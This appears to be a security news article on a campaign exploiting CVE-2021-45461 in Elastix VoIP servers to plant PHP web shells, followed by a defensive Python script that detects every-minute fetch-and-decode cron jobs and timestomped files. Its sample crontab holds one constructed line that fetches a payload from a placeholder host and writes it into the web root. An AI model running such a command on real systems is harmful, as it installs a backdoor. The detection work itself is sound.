Dedicated threat analysts recently discovered a large-scale malicious campaign designed to target Elastix Voice over Internet Protocol (VoIP) telephony servers. In just a three-month period, over 500,000 malware samples were recorded.

Developed for unified communications including email, faxing, instant messaging and Internet Protocol private branch exchange (IP PBX), Elastix is a dedicated server software package used with the Digium phones module designed specifically for FreePBX.

An exploitive campaign unearthed

According to analysts at Unit 42 at Palo Alto Networks, the threat operators involved in the attack could have exploited the remote code execution vulnerability tracked as CVE-2021-45461. The vulnerability carries a critical severity rating of 9.8 out of 10.

Evidence suggests that malicious actors have been exploiting this known vulnerability since December last year, and the recent cybercriminal campaign appears to be closely connected with the security issue.

Researchers at Unit 42 commented that the attackers’ aim was to implant a PHP web shell with the capability to run arbitrary commands on a communication server that had been compromised.

In a recent report, the Palo Alto Networks researchers stated that from December 2021 to March 2022, the threat operator behind the attacks had deployed over 500,000 unique malware samples from the same family.

Currently the threat operation remains active and shares multiple similarities with a 2020 campaign that researchers at the cybersecurity firm Check Point first reported.

Details of the attack

The analysts observed two separate attack groups employing different initial exploitation scripts to deploy a small shell script. The malicious code installs a PHP backdoor on the target’s device, creates root user accounts and establishes persistence through scheduled tasks.

Commenting on this process, the Palo Alto Networks team stated:

“This dropper also tries to blend into the existing environment by spoofing the timestamp of the installed PHP backdoor file to that of a known file already on the system.”

The latest forms of malware are often designed with the ability to avoid detection by both users and security software, and often lie dormant for months before becoming active.

The IP addresses used by the attackers in both groups are based in the Netherlands. However, DNS records also reveal links to multiple adult sites of Russian origin. At present, parts of the payload-delivery infrastructure remain online.

The scheduled task created by the initial script runs every minute and fetches a base64-encoded PHP web shell that can handle multiple incoming web requests, including remotely running arbitrary commands.

Additionally, the web shell features an extra set of built-in commands that allow directory listing, file reading, and reconnaissance of the open-source PBX platform Asterisk.
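Two of the behaviours described above, the every-minute scheduled task that fetches and decodes a PHP web shell and the dropper's spoofing of the backdoor's timestamp, can be triaged on a PBX host with a small script. The following is an added example written for this article, not tooling from Unit 42 or the Elastix project; the crontab lines and the temporary PHP files are constructed, and the URL is a placeholder.

```python
import os, re, tempfile, time

# Constructed sample crontab: two routine jobs and one entry shaped like the reported persistence.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * /usr/bin/php /var/www/html/admin/cron.php
* * * * * curl -s http://PLACEHOLDER.invalid/p.txt | base64 -d > /var/www/html/x.php
"""

FETCH = re.compile(r"\b(curl|wget)\b")
DECODE = re.compile(r"\bbase64\s+(-d|--decode)\b")

def suspicious_cron_entries(crontab_text):
    """Return cron lines that fire every minute and fetch plus base64-decode content."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)          # five schedule fields, then the command
        if len(fields) < 6:
            continue
        every_minute = all(f == "*" for f in fields[:5])
        if every_minute and FETCH.search(fields[5]) and DECODE.search(fields[5]):
            hits.append(line)
    return hits

def timestomped_files(root, suffix=".php", skew_seconds=86400):
    """Flag files whose mtime is far older than their ctime. On Linux, copying another
    file's timestamp rewrites atime/mtime but the kernel still sets ctime to now."""
    flagged = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(suffix):
                st = os.stat(os.path.join(dirpath, name))
                if st.st_ctime - st.st_mtime > skew_seconds:
                    flagged.append(name)
    return sorted(flagged)

def demo_timestomp():
    """Constructed directory: one fresh PHP file, one with its mtime pushed back a year."""
    with tempfile.TemporaryDirectory() as root:
        for name in ("index.php", "backdoor.php"):
            with open(os.path.join(root, name), "w") as f:
                f.write("<?php echo 'sample'; ?>\n")
        year_ago = time.time() - 365 * 86400
        os.utime(os.path.join(root, "backdoor.php"), (year_ago, year_ago))
        return timestomped_files(root)   # returns ["backdoor.php"]
```

Run `suspicious_cron_entries` over the output of `crontab -l` for root and the web-server user, and `timestomped_files` over the web root; the ctime check assumes Linux semantics, where `st_ctime` is the inode change time rather than a creation time.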

The recent report issued by Unit 42 also includes full technical details of how the malicious payloads are dropped and the tactics used to avoid detection in an existing environment. The indicators of compromise listed include the local file paths the malware uses, hashes of the scripts, unique strings and the public URLs used to host the payloads.